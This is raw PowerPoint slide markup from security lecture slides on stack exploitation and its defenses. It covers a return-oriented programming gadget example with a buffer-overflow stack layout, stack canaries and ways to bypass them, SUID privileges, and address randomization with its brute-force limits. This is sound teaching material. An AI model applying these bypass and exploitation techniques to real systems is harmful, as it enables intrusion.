              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hovav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shacham</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our thesis: In any sufficiently large body of x86 executable code there will exist sufficiently many useful code sequences that an attacker who controls the stack will be able, by means of the return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> techniques we introduce, to cause the exploited program to undertake arbitrary computations. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="4800600"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C48C68F-D55B-E346-9895-9FEE0C87EFA0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>224</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2291694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Gadgets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gadget 1 at address X:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gadget 2 at address Y:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The buffer overflow will overwrite the stack as follows:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064982" y="3397162"/>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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064982" y="3758563"/>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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064982" y="4119964"/>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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064982" y="4481365"/>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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660795" y="4491690"/>
            <a:ext cx="1197764" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Saved EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4305488" y="3500420"/>
            <a:ext cx="10325" cy="123908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50037" y="3405093"/>
            <a:ext cx="1974970" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Higher Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40145202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Exploitation Harder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The next step is preventing the overwrite of the return address on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 2: Canaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks, USENIX Security 1998</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387305286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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>StackGuard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1184773" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> writes a canary value before the return address on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Terminator canary: NULL(0x00), CR (0x0d), LF (0x0a) and EOF (0xff)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random canary: random value stored in location known only to the validation code (and protected with unmapped pages)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XOR canary: random ^ return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During the epilogue the value is verified before performing a ret instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is achieved by means of a modified function prologue/epilogue (requires recompilation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduces overhead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370128007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Canaries in Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The GNU compiler (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) implements a form of stack protection, known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ProPolice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or Stack Smashing Protector (SSP), since version 4.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-protector-all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ProPolice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> combines canaries with a stack layout that minimizes the chances of being exploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rearranges memory so that arrays cannot be used to overwrite local variables (e.g., a function pointer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arguments cannot be rearranged, and therefore function pointer arguments are copied into local variables and then the local reference is used within the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See “Protecting from stack-smashing attacks” by Hiroaki </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Etoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kunikazu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Yoda </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316014383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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypassing Canaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188867" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Canaries can be bypassed by overflowing a pointer used as a destination of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()-like function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can overwrite the return address without touching the canary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The XOR canary was introduced to protect from this attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointers in the function frame can still be overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This require knowledge of the process memory layout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: Window implements similar protection using the /GS compiler option</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3760039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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNIX Processes/Threads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each process/thread has a real UID/GID, an effective UID/GID, and a saved UID/GID </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real IDs: defines the user who started/owns the process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Effective IDs: used to determine the capability of the process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved IDs: used to drop and re-gain privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an executable has the SUID bit set, when a process executes the program the process’ effective UID/GID are changed to those of the program file owner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>vigna@longboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>~: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> -al /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>usr/bin/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Hack Bold"/>
              <a:cs typeface="Hack Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>rwsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>-x 1 root root 54256 May 16 16:37 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Hack Bold"/>
              <a:cs typeface="Hack Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318635428"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOv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The next step is making guessing addresses hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 3: Address Layout Randomization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270362149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 Layout Randomization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Randomizes the position of the heap, the stack, the program’s code, and the dynamically-linked libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Library random positioning requires position-independent code (or if this is not possible, some run-time overhead to handle the mapping of references)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Makes return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attacks much harder, as the location of the library code has to be guessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Depending on the implementation, libraries are randomized with 16 bits of entropy on 32-bit architectures (requires, in average 32K attempts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Still vulnerable to brute-force attack, if unlimited attempts are possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>64-bit architectures are much more secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="4800600"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>231</a:t>
            </a:fld>
